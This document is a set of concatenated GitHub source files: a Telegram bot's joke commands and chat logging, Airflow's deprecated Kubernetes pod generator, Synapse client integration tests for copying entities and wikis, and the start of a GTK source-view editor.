except Exception:
return False
def fightResponse(currentMessage):
response = ""
fightingMe = False
try:
response = "OH FUCK, " + currentMessage.from_user.first_name.upper() + " WANTS TO FIGHT " + currentMessage.reply_to_message.from_user.first_name.upper() + "!"
fightingMe = currentMessage.reply_to_message.from_user.first_name.lower() == "adamtestbot"
except Exception:
try:
if len(currentMessage.text) <= len("/fight "):
raise Exception
response = "OH SHIT, " + currentMessage.from_user.first_name.upper() + " WANTS TO FIGHT " + currentMessage.text[len("/fight "):].upper() + "!"
fightingMe = currentMessage.text[len("/fight "):].lower() == "adamtestbot" or currentMessage.text[len("/fight "):].lower() == "@adamtestbot"
except Exception:
fightingMe = True
if fightingMe:
response = "You wanna fight ME, " + currentMessage.from_user.first_name + "??"
return response
def summonResponse(currentMessage):
response = ""
summoningMe = False
try:
response = currentMessage.from_user.first_name + " is summoning " + currentMessage.reply_to_message.from_user.first_name + "!"
summoningMe = currentMessage.reply_to_message.from_user.first_name.lower() == "adamtestbot"
except Exception:
try:
if len(currentMessage.text) <= len("/summon "):
raise Exception
response = currentMessage.from_user.first_name + " is summoning " + currentMessage.text[len("/summon "):] + "!"
summoningMe = currentMessage.text[len("/summon "):].lower() == "adamtestbot" or currentMessage.text[len("/summon "):].lower() == "@adamtestbot"
except Exception:
summoningMe = True
if summoningMe:
response = "I\'m already here, " + currentMessage.from_user.first_name + "."
return response
def pickResponse(messageText):
wholeTextArray = re.split(r'[@\s*]', messageText[len("/pick "):])
if len(messageText) <= len("/pick "):
return "Usage: /pick Name Name Name"
else:
answerIndex = random.randint(0, len(wholeTextArray) - 1)
return wholeTextArray[answerIndex]
def blaze(currentMessage):
checkingStats = False
try:
if currentMessage.text.lower().split()[1] == "stats":
#db = Base('chatStorage/blaze.pdl') #The path to the database
#db.create('username', 'name', 'counter', 'timestamp', mode="open") #Create a new DB if one doesn't exist. If it does, open it
outputString = "JOINTS BLAZED:\n"
K = list()
for user in builtins.blazeDB:
K.append(user)
sortedK = sorted(K, key=lambda x: int(x['counter']), reverse=True)
for user in sortedK:
pluralString = " JOINT"
if not(int(user["counter"]) == 1):
pluralString += "S"
pluralString += "\n"
if int(user['timestamp']) + (24 * 3600) - 60 > time.mktime(currentMessage.date.timetuple()):
outputString += "*"
outputString += user["name"].upper() + ": " + str(user["counter"]) + pluralString
return outputString
checkingStats = True
except IndexError:
pass
start = datetime.time(4, 20)
end = datetime.time(4, 20)
time_received = currentMessage.date
print(start)
print(time_received)
start2 = datetime.time(16, 20)
end2 = datetime.time(16, 20)
if start <= datetime.time(time_received.hour, time_received.minute) <= end: #4:20 AM
if not checkingStats:
return currentMessage.from_user.first_name + ", I know you like staying up late, but you really need to puff puff pass out."
elif (start2 <= datetime.time(time_received.hour, time_received.minute) <= end2) and not checkingStats:
pointsReceived = 4 - int(time_received.second / 15)
print("DEBUG TIME: PointsReceived=" + str(pointsReceived))
#db = Base('chatStorage/blaze.pdl') #The path to the database
#db.create('username', 'name', 'counter', 'timestamp', mode="open") #Create a new DB if one doesn't exist. If it does, open it
userWasFound = False
valueSuccessfullyChanged = False
userPoints = 0
for user in builtins.blazeDB:
# print user['username']
if int(user['username']) == currentMessage.from_user.id:
if time.mktime(currentMessage.date.timetuple()) - 60 > int(user['timestamp']):
builtins.blazeDB.update(user, counter=int(user['counter']) + pointsReceived)
userPoints = user['counter']
builtins.blazeDB.update(user, timestamp=int(time.mktime(currentMessage.date.timetuple())))
valueSuccessfullyChanged = True
print("Found user!\n")
userWasFound = True
if not userWasFound:
builtins.blazeDB.insert(currentMessage.from_user.id, currentMessage.from_user.first_name, pointsReceived, int(time.mktime(currentMessage.date.timetuple())))
userPoints = pointsReceived
if valueSuccessfullyChanged or not userWasFound:
pluralString = " JOINT"
if pointsReceived > 1:
pluralString = pluralString + "S"
#db.commit() #Write the in memory DB changes to disk
return currentMessage.from_user.first_name.upper() + " 420 BLAZED IT AT " + str(time_received.second).upper() + " SECONDS. THEY BLAZED " + str(pointsReceived) + pluralString + " AND HAVE NOW SMOKED " + str(userPoints) + " IN TOTAL."
else:
return currentMessage.from_user.first_name + " is getting a bit too eager to blaze it."
else:
if not checkingStats:
return currentMessage.from_user.first_name + " failed to blaze."
def first_vowel(s):
if s[0].lower() != "y":
i = re.search("[aeiouy]", s, re.IGNORECASE)
else:
i = re.search("[aeiou]", s, re.IGNORECASE)
return 0 if i is None else i.start()
def log(user_id, currentMessage):
try:
K = list()
logExists = os.path.exists('../log/' + str(user_id * -1) + 'log.csv')
fieldnames = ['name', 'text']
if logExists:
try:
with open('../log/' + str(user_id * -1) + 'log.csv', 'r+') as csvfile:
reader = csv.DictReader(csvfile)
K = list(reader)
with open('../log/' + str(user_id * -1) + 'log.csv', 'w+') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for x in K:
writer.writerow(x)
writer.writerow({'name': currentMessage.from_user.first_name, 'text': currentMessage.text})
except Exception:
pass
else:
file('../log/' + str(user_id * -1) + 'log.csv', 'a').close()
with open('../log/' + str(user_id * -1) + 'log.csv', 'w+') as csvfile:
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
writer.writerow({'name': currentMessage.from_user.first_name, 'text': currentMessage.text})
except Exception:
traceback.format_exc()
| {
"content_hash": "ffefa544a561add9dd7efe990e96e3c5",
"timestamp": "",
"source": "github",
"line_count": 435,
"max_line_length": 244,
"avg_line_length": 40.53793103448276,
"alnum_prop": 0.5940229102869456,
"repo_name": "magomez96/AdamTestBot",
"id": "0888d49eda8d661ba831c8384cf0ec7cda7704ab",
"size": "17634",
"binary": false,
"copies": "1",
"ref": "refs/heads/ATB-3.0",
"path": "src/atbMiscFunctions.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "50"
},
{
"name": "Python",
"bytes": "1115187"
},
{
"name": "Shell",
"bytes": "309"
}
],
"symlink_target": ""
} |
"""
This module provides an interface between the previous Pod
API and outputs a kubernetes.client.models.V1Pod.
The advantage being that the full Kubernetes API
is supported and no serialization need be written.
"""
from __future__ import annotations
import copy
import hashlib
import re
import uuid
from kubernetes.client import models as k8s
MAX_POD_ID_LEN = 253
MAX_LABEL_LEN = 63
class PodDefaults:
"""Static defaults for Pods"""
XCOM_MOUNT_PATH = "/airflow/xcom"
SIDECAR_CONTAINER_NAME = "airflow-xcom-sidecar"
XCOM_CMD = 'trap "exit 0" INT; while true; do sleep 30; done;'
VOLUME_MOUNT = k8s.V1VolumeMount(name="xcom", mount_path=XCOM_MOUNT_PATH)
VOLUME = k8s.V1Volume(name="xcom", empty_dir=k8s.V1EmptyDirVolumeSource())
SIDECAR_CONTAINER = k8s.V1Container(
name=SIDECAR_CONTAINER_NAME,
command=["sh", "-c", XCOM_CMD],
image="alpine",
volume_mounts=[VOLUME_MOUNT],
resources=k8s.V1ResourceRequirements(
requests={
"cpu": "1m",
}
),
)
def make_safe_label_value(string):
"""
Valid label values must be 63 characters or less and must be empty or begin and
end with an alphanumeric character ([a-z0-9A-Z]) with dashes (-), underscores (_),
dots (.), and alphanumerics between.
If the label value is greater than 63 chars once made safe, or differs in any
way from the original value sent to this function, then we need to truncate to
53 chars, and append it with a unique hash.
"""
safe_label = re.sub(r"^[^a-z0-9A-Z]*|[^a-zA-Z0-9_\-\.]|[^a-z0-9A-Z]*$", "", string)
if len(safe_label) > MAX_LABEL_LEN or string != safe_label:
safe_hash = hashlib.md5(string.encode()).hexdigest()[:9]
safe_label = safe_label[: MAX_LABEL_LEN - len(safe_hash) - 1] + "-" + safe_hash
return safe_label
class PodGenerator:
"""
Contains Kubernetes Airflow Worker configuration logic
Represents a kubernetes pod and manages execution of a single pod.
Any configuration that is container specific gets applied to
the first container in the list of containers.
:param image: The docker image
:param name: name in the metadata section (not the container name)
:param namespace: pod namespace
:param volume_mounts: list of kubernetes volumes mounts
:param envs: A dict containing the environment variables
:param cmds: The command to be run on the first container
:param args: The arguments to be run on the pod
:param labels: labels for the pod metadata
:param node_selectors: node selectors for the pod
:param ports: list of ports. Applies to the first container.
:param volumes: Volumes to be attached to the first container
:param image_pull_policy: Specify a policy to cache or always pull an image
:param restart_policy: The restart policy of the pod
:param image_pull_secrets: Any image pull secrets to be given to the pod.
If more than one secret is required, provide a comma separated list:
secret_a,secret_b
:param init_containers: A list of init containers
:param service_account_name: Identity for processes that run in a Pod
:param resources: Resource requirements for the first containers
:param annotations: annotations for the pod
:param affinity: A dict containing a group of affinity scheduling rules
:param hostnetwork: If True enable host networking on the pod
:param tolerations: A list of kubernetes tolerations
:param security_context: A dict containing the security context for the pod
:param configmaps: Any configmap refs to envfrom.
If more than one configmap is required, provide a comma separated list
configmap_a,configmap_b
:param dnspolicy: Specify a dnspolicy for the pod
:param schedulername: Specify a schedulername for the pod
:param pod: The fully specified pod. Mutually exclusive with `path_or_string`
:param extract_xcom: Whether to bring up a container for xcom
:param priority_class_name: priority class name for the launched Pod
"""
def __init__(
self,
image: str | None = None,
name: str | None = None,
namespace: str | None = None,
volume_mounts: list[k8s.V1VolumeMount | dict] | None = None,
envs: dict[str, str] | None = None,
cmds: list[str] | None = None,
args: list[str] | None = None,
labels: dict[str, str] | None = None,
node_selectors: dict[str, str] | None = None,
ports: list[k8s.V1ContainerPort | dict] | None = None,
volumes: list[k8s.V1Volume | dict] | None = None,
image_pull_policy: str | None = None,
restart_policy: str | None = None,
image_pull_secrets: str | None = None,
init_containers: list[k8s.V1Container] | None = None,
service_account_name: str | None = None,
resources: k8s.V1ResourceRequirements | dict | None = None,
annotations: dict[str, str] | None = None,
affinity: dict | None = None,
hostnetwork: bool = False,
tolerations: list | None = None,
security_context: k8s.V1PodSecurityContext | dict | None = None,
configmaps: list[str] | None = None,
dnspolicy: str | None = None,
schedulername: str | None = None,
extract_xcom: bool = False,
priority_class_name: str | None = None,
):
self.pod = k8s.V1Pod()
self.pod.api_version = "v1"
self.pod.kind = "Pod"
# Pod Metadata
self.metadata = k8s.V1ObjectMeta()
self.metadata.labels = labels
self.metadata.name = name
self.metadata.namespace = namespace
self.metadata.annotations = annotations
# Pod Container
self.container = k8s.V1Container(name="base")
self.container.image = image
self.container.env = []
if envs:
if isinstance(envs, dict):
for key, val in envs.items():
self.container.env.append(k8s.V1EnvVar(name=key, value=val))
elif isinstance(envs, list):
self.container.env.extend(envs)
configmaps = configmaps or []
self.container.env_from = []
for configmap in configmaps:
self.container.env_from.append(
k8s.V1EnvFromSource(config_map_ref=k8s.V1ConfigMapEnvSource(name=configmap))
)
self.container.command = cmds or []
self.container.args = args or []
if image_pull_policy:
self.container.image_pull_policy = image_pull_policy
self.container.ports = ports or []
self.container.resources = resources
self.container.volume_mounts = volume_mounts or []
# Pod Spec
self.spec = k8s.V1PodSpec(containers=[])
self.spec.security_context = security_context
self.spec.tolerations = tolerations
if dnspolicy:
self.spec.dns_policy = dnspolicy
self.spec.scheduler_name = schedulername
self.spec.host_network = hostnetwork
self.spec.affinity = affinity
self.spec.service_account_name = service_account_name
self.spec.init_containers = init_containers
self.spec.volumes = volumes or []
self.spec.node_selector = node_selectors
if restart_policy:
self.spec.restart_policy = restart_policy
self.spec.priority_class_name = priority_class_name
self.spec.image_pull_secrets = []
if image_pull_secrets:
for image_pull_secret in image_pull_secrets.split(","):
self.spec.image_pull_secrets.append(k8s.V1LocalObjectReference(name=image_pull_secret))
# Attach sidecar
self.extract_xcom = extract_xcom
def gen_pod(self) -> k8s.V1Pod:
"""Generates pod"""
result = None
if result is None:
result = self.pod
result.spec = self.spec
result.metadata = self.metadata
result.spec.containers = [self.container]
result.metadata.name = self.make_unique_pod_id(result.metadata.name)
if self.extract_xcom:
result = self.add_sidecar(result)
return result
@staticmethod
def add_sidecar(pod: k8s.V1Pod) -> k8s.V1Pod:
"""Adds sidecar"""
pod_cp = copy.deepcopy(pod)
pod_cp.spec.volumes = pod.spec.volumes or []
pod_cp.spec.volumes.insert(0, PodDefaults.VOLUME)
pod_cp.spec.containers[0].volume_mounts = pod_cp.spec.containers[0].volume_mounts or []
pod_cp.spec.containers[0].volume_mounts.insert(0, PodDefaults.VOLUME_MOUNT)
pod_cp.spec.containers.append(PodDefaults.SIDECAR_CONTAINER)
return pod_cp
@staticmethod
def from_obj(obj) -> k8s.V1Pod | None:
"""Converts to pod from obj"""
if obj is None:
return None
if isinstance(obj, PodGenerator):
return obj.gen_pod()
if not isinstance(obj, dict):
raise TypeError(
"Cannot convert a non-dictionary or non-PodGenerator "
"object into a KubernetesExecutorConfig"
)
# We do not want to extract constant here from ExecutorLoader because it is just
# A name in dictionary rather than executor selection mechanism and it causes cyclic import
namespaced = obj.get("KubernetesExecutor", {})
if not namespaced:
return None
resources = namespaced.get("resources")
if resources is None:
requests = {
"cpu": namespaced.get("request_cpu"),
"memory": namespaced.get("request_memory"),
"ephemeral-storage": namespaced.get("ephemeral-storage"),
}
limits = {
"cpu": namespaced.get("limit_cpu"),
"memory": namespaced.get("limit_memory"),
"ephemeral-storage": namespaced.get("ephemeral-storage"),
}
all_resources = list(requests.values()) + list(limits.values())
if all(r is None for r in all_resources):
resources = None
else:
resources = k8s.V1ResourceRequirements(requests=requests, limits=limits)
namespaced["resources"] = resources
return PodGenerator(**namespaced).gen_pod()
@staticmethod
def make_unique_pod_id(dag_id):
r"""
Kubernetes pod names must be <= 253 chars and must pass the following regex for
validation
``^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$``
:param dag_id: a dag_id with only alphanumeric characters
:return: ``str`` valid Pod name of appropriate length
"""
if not dag_id:
return None
safe_uuid = uuid.uuid4().hex
safe_pod_id = dag_id[: MAX_POD_ID_LEN - len(safe_uuid) - 1] + "-" + safe_uuid
return safe_pod_id
| {
"content_hash": "1b0d07daedeeead6d48ce5adfc3a05d4",
"timestamp": "",
"source": "github",
"line_count": 286,
"max_line_length": 103,
"avg_line_length": 38.44405594405595,
"alnum_prop": 0.6277398817644384,
"repo_name": "apache/airflow",
"id": "f08a6c45d223199f8aaeb7d68f82bca55853c6f6",
"size": "11780",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "airflow/kubernetes/pod_generator_deprecated.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "71458"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "172957"
},
{
"name": "JavaScript",
"bytes": "143915"
},
{
"name": "Jinja",
"bytes": "38911"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "23697738"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "211306"
},
{
"name": "TypeScript",
"bytes": "521019"
}
],
"symlink_target": ""
} |
import uuid
import time
import re
import json
import pytest
from synapseclient.core.exceptions import SynapseHTTPError
from synapseclient import Activity, Annotations, Column, File, Folder, Link, Project, Row, RowSet, Schema, Wiki
import synapseclient.core.utils as utils
import synapseutils
# Add Test for UPDATE
# Add test for existing provenance but the orig doesn't have provenance
def test_copy(syn, schedule_for_cleanup):
"""Tests the copy function"""
# Create a Project
project_entity = syn.store(Project(name=str(uuid.uuid4())))
schedule_for_cleanup(project_entity.id)
# Create two Folders in Project
folder_entity = syn.store(Folder(name=str(uuid.uuid4()), parent=project_entity))
second_folder = syn.store(Folder(name=str(uuid.uuid4()), parent=project_entity))
third_folder = syn.store(Folder(name=str(uuid.uuid4()), parent=project_entity))
schedule_for_cleanup(folder_entity.id)
schedule_for_cleanup(second_folder.id)
schedule_for_cleanup(third_folder.id)
# Annotations and provenance
repo_url = 'https://github.com/Sage-Bionetworks/synapsePythonClient'
annos = {'test': ['hello_world']}
prov = Activity(name="test", used=repo_url)
# Create, upload, and set annotations/provenance on a file in Folder
filename = utils.make_bogus_data_file()
schedule_for_cleanup(filename)
file_entity = syn.store(File(filename, parent=folder_entity))
externalURL_entity = syn.store(File(repo_url, name='rand', parent=folder_entity, synapseStore=False))
syn.set_annotations(Annotations(file_entity, file_entity.etag, annos))
syn.set_annotations(Annotations(externalURL_entity, externalURL_entity.etag, annos))
syn.setProvenance(externalURL_entity.id, prov)
schedule_for_cleanup(file_entity.id)
schedule_for_cleanup(externalURL_entity.id)
# ------------------------------------
# TEST COPY FILE
# ------------------------------------
output = synapseutils.copy(syn, file_entity.id, destinationId=project_entity.id)
output_URL = synapseutils.copy(syn, externalURL_entity.id, destinationId=project_entity.id,
skipCopyAnnotations=True)
# Verify that our copied files are identical
copied_ent = syn.get(output[file_entity.id])
copied_URL_ent = syn.get(output_URL[externalURL_entity.id], downloadFile=False)
copied_ent_annot = syn.get_annotations(copied_ent)
copied_url_annot = syn.get_annotations(copied_URL_ent)
copied_prov = syn.getProvenance(copied_ent)
copied_url_prov = syn.getProvenance(copied_URL_ent)
schedule_for_cleanup(copied_ent.id)
schedule_for_cleanup(copied_URL_ent.id)
# TEST: set_Provenance = Traceback
assert copied_prov['used'][0]['reference']['targetId'] == file_entity.id
assert copied_url_prov['used'][0]['reference']['targetId'] == externalURL_entity.id
# TEST: Make sure copied files are the same
assert copied_ent_annot == annos
assert copied_ent.dataFileHandleId == file_entity.dataFileHandleId
# TEST: Make sure copied URLs are the same
assert copied_url_annot == {}
assert copied_URL_ent.externalURL == repo_url
assert copied_URL_ent.name == 'rand'
assert copied_URL_ent.dataFileHandleId == externalURL_entity.dataFileHandleId
# TEST: Throw error if file is copied to a folder/project that has a file with the same filename
pytest.raises(ValueError, synapseutils.copy, syn, project_entity.id, destinationId=project_entity.id)
pytest.raises(ValueError, synapseutils.copy, syn, file_entity.id, destinationId=project_entity.id)
pytest.raises(ValueError, synapseutils.copy, syn, file_entity.id, destinationId=third_folder.id,
setProvenance="gib")
pytest.raises(ValueError, synapseutils.copy, syn, file_entity.id, destinationId=file_entity.id)
# Test: setProvenance = None
output = synapseutils.copy(syn, file_entity.id, destinationId=second_folder.id, setProvenance=None)
pytest.raises(SynapseHTTPError, syn.getProvenance, output[file_entity.id])
schedule_for_cleanup(output[file_entity.id])
# Test: setProvenance = Existing
output_URL = synapseutils.copy(syn, externalURL_entity.id, destinationId=second_folder.id, setProvenance="existing")
output_prov = syn.getProvenance(output_URL[externalURL_entity.id])
schedule_for_cleanup(output_URL[externalURL_entity.id])
assert output_prov['name'] == prov['name']
assert output_prov['used'] == prov['used']
# ------------------------------------
# TEST COPY LINKS
# ------------------------------------
second_file = utils.make_bogus_data_file()
# schedule_for_cleanup(filename)
second_file_entity = syn.store(File(second_file, parent=project_entity))
link_entity = Link(second_file_entity.id, parent=folder_entity.id)
link_entity = syn.store(link_entity)
copied_link = synapseutils.copy(syn, link_entity.id, destinationId=second_folder.id)
old = syn.get(link_entity.id, followLink=False)
new = syn.get(copied_link[link_entity.id], followLink=False)
assert old.linksTo['targetId'] == new.linksTo['targetId']
schedule_for_cleanup(second_file_entity.id)
schedule_for_cleanup(link_entity.id)
schedule_for_cleanup(copied_link[link_entity.id])
time.sleep(3)
pytest.raises(ValueError, synapseutils.copy, syn, link_entity.id, destinationId=second_folder.id)
# ------------------------------------
# TEST COPY TABLE
# ------------------------------------
second_project = syn.store(Project(name=str(uuid.uuid4())))
schedule_for_cleanup(second_project.id)
cols = [Column(name='n', columnType='DOUBLE', maximumSize=50),
Column(name='c', columnType='STRING', maximumSize=50),
Column(name='i', columnType='INTEGER')]
data = [[2.1, 'foo', 10],
[2.2, 'bar', 20],
[2.3, 'baz', 30]]
schema = syn.store(Schema(name='Testing', columns=cols, parent=project_entity.id))
syn.store(RowSet(schema=schema, rows=[Row(r) for r in data]))
table_map = synapseutils.copy(syn, schema.id, destinationId=second_project.id)
copied_table = syn.tableQuery('select * from %s' % table_map[schema.id])
rows = copied_table.asRowSet()['rows']
# TEST: Check if all values are the same
for i, row in enumerate(rows):
assert row['values'] == data[i]
pytest.raises(ValueError, synapseutils.copy, syn, schema.id, destinationId=second_project.id)
schedule_for_cleanup(schema.id)
schedule_for_cleanup(table_map[schema.id])
# ------------------------------------
# TEST COPY FOLDER
# ------------------------------------
mapping = synapseutils.copy(syn, folder_entity.id, destinationId=second_project.id)
for i in mapping:
old = syn.get(i, downloadFile=False)
new = syn.get(mapping[i], downloadFile=False)
assert old.name == new.name
assert old.annotations == new.annotations
assert old.concreteType == new.concreteType
pytest.raises(ValueError, synapseutils.copy, syn, folder_entity.id, destinationId=second_project.id)
# TEST: Throw error if excludeTypes isn't in file, link and table or isn't a list
pytest.raises(ValueError, synapseutils.copy, syn, second_folder.id, destinationId=second_project.id,
excludeTypes=["foo"])
pytest.raises(ValueError, synapseutils.copy, syn, second_folder.id, destinationId=second_project.id,
excludeTypes="file")
# TEST: excludeType = ["file"], only the folder is created
second = synapseutils.copy(syn, second_folder.id, destinationId=second_project.id,
excludeTypes=["file", "table", "link"])
copied_folder = syn.get(second[second_folder.id])
assert copied_folder.name == second_folder.name
assert len(second) == 1
# TEST: Make sure error is thrown if foldername already exists
pytest.raises(ValueError, synapseutils.copy, syn, second_folder.id, destinationId=second_project.id)
# ------------------------------------
# TEST COPY PROJECT
# ------------------------------------
third_project = syn.store(Project(name=str(uuid.uuid4())))
schedule_for_cleanup(third_project.id)
mapping = synapseutils.copy(syn, project_entity.id, destinationId=third_project.id)
for i in mapping:
old = syn.get(i, downloadFile=False)
new = syn.get(mapping[i], downloadFile=False)
if not isinstance(old, Project):
assert old.name == new.name
assert old.annotations == new.annotations
assert old.concreteType == new.concreteType
# TEST: Can't copy project to a folder
pytest.raises(ValueError, synapseutils.copy, syn, project_entity.id, destinationId=second_folder.id)
class TestCopyWiki:
@pytest.fixture(autouse=True)
def init(self, syn, schedule_for_cleanup):
self.syn = syn
self.schedule_for_cleanup = schedule_for_cleanup
# Create a Project
self.project_entity = syn.store(Project(name=str(uuid.uuid4())))
filename = utils.make_bogus_data_file()
attachname = utils.make_bogus_data_file()
file_entity = self.syn.store(File(filename, parent=self.project_entity))
self.schedule_for_cleanup(self.project_entity.id)
self.schedule_for_cleanup(filename)
self.schedule_for_cleanup(file_entity.id)
# Create mock wiki
md = """
This is a test wiki
=======================
Blabber jabber blah blah boo.
syn123
syn456
"""
wiki = Wiki(owner=self.project_entity, title='A Test Wiki', markdown=md,
attachments=[attachname])
wiki = self.syn.store(wiki)
# Create a Wiki sub-page
subwiki = Wiki(owner=self.project_entity, title='A sub-wiki',
markdown='%s' % file_entity.id, parentWikiId=wiki.id)
self.subwiki = self.syn.store(subwiki)
second_md = """
Testing internal links
======================
[test](#!Synapse:%s/wiki/%s)
%s)
""" % (self.project_entity.id, self.subwiki.id, file_entity.id)
sub_subwiki = Wiki(owner=self.project_entity, title='A sub-sub-wiki', markdown=second_md,
parentWikiId=self.subwiki.id, attachments=[attachname])
self.sub_subwiki = self.syn.store(sub_subwiki)
# Set up the second project
self.second_project = self.syn.store(Project(name=str(uuid.uuid4())))
self.schedule_for_cleanup(self.second_project.id)
self.fileMapping = {'syn123': 'syn12345', 'syn456': 'syn45678'}
self.first_headers = self.syn.getWikiHeaders(self.project_entity)
def test_copy_Wiki(self):
second_headers = synapseutils.copyWiki(self.syn, self.project_entity.id, self.second_project.id,
entityMap=self.fileMapping)
mapping = dict()
# Check that all wikis were copied correctly with the correct mapping
for index, info in enumerate(second_headers):
mapping[self.first_headers[index]['id']] = info['id']
assert self.first_headers[index]['title'] == info['title']
if info.get('parentId', None) is not None:
# Check if parent Ids are mapping correctly in the copied Wikis
assert info['parentId'] == mapping[self.first_headers[index]['parentId']]
# Check that all wikis have the correct attachments and have correct internal synapse link/file mapping
for index, info in enumerate(second_headers):
# Check if markdown is the correctly mapped
orig_wikiPage = self.syn.getWiki(self.project_entity, self.first_headers[index]['id'])
new_wikiPage = self.syn.getWiki(self.second_project, info['id'])
s = orig_wikiPage.markdown
for oldWikiId in mapping.keys():
oldProjectAndWikiId = "%s/wiki/%s" % (self.project_entity.id, oldWikiId)
newProjectAndWikiId = "%s/wiki/%s" % (self.second_project.id, mapping[oldWikiId])
s = re.sub(oldProjectAndWikiId, newProjectAndWikiId, s)
for oldFileId in self.fileMapping.keys():
s = re.sub(oldFileId, self.fileMapping[oldFileId], s)
assert s == new_wikiPage.markdown
orig_attach = self.syn.getWikiAttachments(orig_wikiPage)
new_attach = self.syn.getWikiAttachments(new_wikiPage)
orig_file = [i['fileName'] for i in orig_attach
if not i['isPreview']]
new_file = [i['fileName'] for i in new_attach
if not i['isPreview']]
# check that attachment file names are the same
assert orig_file == new_file
def test_entitySubPageId_and_destinationSubPageId(self):
# Test: entitySubPageId
second_header = synapseutils.copyWiki(self.syn, self.project_entity.id, self.second_project.id,
entitySubPageId=self.sub_subwiki.id, destinationSubPageId=None,
updateLinks=False, updateSynIds=False, entityMap=None)
test_ent_subpage = self.syn.getWiki(self.second_project.id, second_header[0]['id'])
# Test: No internal links updated
assert test_ent_subpage.markdown == self.sub_subwiki.markdown
assert test_ent_subpage.title == self.sub_subwiki.title
# Test: destinationSubPageId
third_header = synapseutils.copyWiki(self.syn, self.project_entity.id, self.second_project.id,
entitySubPageId=self.subwiki.id,
destinationSubPageId=test_ent_subpage.id, updateLinks=False,
updateSynIds=False, entityMap=None)
temp = self.syn.getWiki(self.second_project.id, third_header[0]['id'])
# There are issues where some title pages are blank. This is an issue that needs to be addressed
assert temp.title == self.subwiki.title
assert temp.markdown == self.subwiki.markdown
temp = self.syn.getWiki(self.second_project.id, third_header[1]['id'])
assert temp.title == self.sub_subwiki.title
assert temp.markdown == self.sub_subwiki.markdown
class TestCopyFileHandles:
@pytest.fixture(autouse=True)
def init(self, syn, schedule_for_cleanup):
self.syn = syn
# create external file handles for https://www.synapse.org/images/logo.svg,
project = Project(str(uuid.uuid4()))
project = self.syn.store(project)
schedule_for_cleanup(project)
# create file entity from externalFileHandle
external_file_handle_request_1 = {
"concreteType": "org.sagebionetworks.repo.model.file.ExternalFileHandle",
"externalURL": "https://www.synapse.org/images/logo.svg",
"fileName": "testExternalFileHandle"
}
external_response_1 = self.syn.restPOST('/externalFileHandle', body=json.dumps(external_file_handle_request_1),
endpoint=self.syn.fileHandleEndpoint)
self.file_handle_id_1 = external_response_1['id']
test_entity_1 = File(parent=project)
test_entity_1.dataFileHandleId = self.file_handle_id_1
test_entity_1 = self.syn.store(test_entity_1)
self.obj_id_1 = str(test_entity_1['id'][3:])
def test_copy_file_handles(self):
# define inputs
file_handles = [self.file_handle_id_1]
associate_object_types = ["FileEntity"]
associate_object_ids = [self.obj_id_1]
copy_results = synapseutils.copyFileHandles(
self.syn, file_handles, associate_object_types, associate_object_ids
)
# assert copy result contains one copy result
assert len(copy_results) == 1
| {
"content_hash": "a19b453963a4b916d416e0e65bd16e7b",
"timestamp": "",
"source": "github",
"line_count": 346,
"max_line_length": 120,
"avg_line_length": 46.19364161849711,
"alnum_prop": 0.6414940874679347,
"repo_name": "thomasyu888/synapsePythonClient",
"id": "91e32778638bccf4ea34ebf4a485360db90699cc",
"size": "15983",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "tests/integration/synapseutils/test_synapseutils_copy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "420"
},
{
"name": "Python",
"bytes": "1573386"
}
],
"symlink_target": ""
} |
import gtk
import gobject
import os.path
import debugger
from util import *
from editor_base import *
from source_view_tab import SourceViewTab
class SourceViewFileNotFoundTab(gtk.VBox):
def __init__(self,file_handle):
EditorTabInterface.validate_implementation(self)
gtk.VBox.__init__(self,file)
l = gtk.Label("File not found: %s" % file)
self._file_handle = file_handle
self.pack_start(l,True,True,0)
self.show_all()
@property
def file_handle(self):
return self._file_handle
class SourceViewEditor(EditorBase):
def __init__(self,mc):
EditorBase.__init__(self, mc)
self._notebook = gtk.Notebook()
self._notebook.set_tab_pos(gtk.POS_TOP)
self._tabs_with_files_that_exist = {}
# control 1 thru 9 modifiers
self.overlay.add_keyboard_action('source_view_editor.focus_tab_1', lambda: self._focus_nth_tab(0))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_2', lambda: self._focus_nth_tab(1))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_3', lambda: self._focus_nth_tab(2))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_4', lambda: self._focus_nth_tab(3))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_5', lambda: self._focus_nth_tab(4))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_6', lambda: self._focus_nth_tab(5))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_7', lambda: self._focus_nth_tab(6))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_8', lambda: self._focus_nth_tab(7))
self.overlay.add_keyboard_action('source_view_editor.focus_tab_9', lambda: self._focus_nth_tab(self._notebook.get_n_pages() - 1))
self._notebook.connect('page-added', self._on_page_added)
self._notebook.connect('page-removed', self._on_page_removed)
@property
def widget(self):
return self._notebook
# EditorBase methods
############################################################################
def focus_file(self, file_handle, line_no = -1):
if file_handle.exists:
if not self._tabs_with_files_that_exist.has_key(file_handle.absolute_name):
v = SourceViewTab(self, file_handle)
bn = file_handle.basename
v.show_all()
self._notebook.append_page(v,gtk.Label(bn))
if not self._tabs_with_files_that_exist.has_key(file_handle.absolute_name):
# only happens on shutdown...
return
v = self._tabs_with_files_that_exist[file_handle.absolute_name]
assert v
self._focus_tab(v)
if line_no != -1:
v.focus_line(line_no)
else:
# TODO show the file not found tab...
pass
def get_current_location(self):
tab_num = self._notebook.get_current_page()
tab = self._notebook.get_nth_page(tab_num)
fh = tab.file_handle
line_num = tab.get_current_line()
return fh.make_location(line_num)
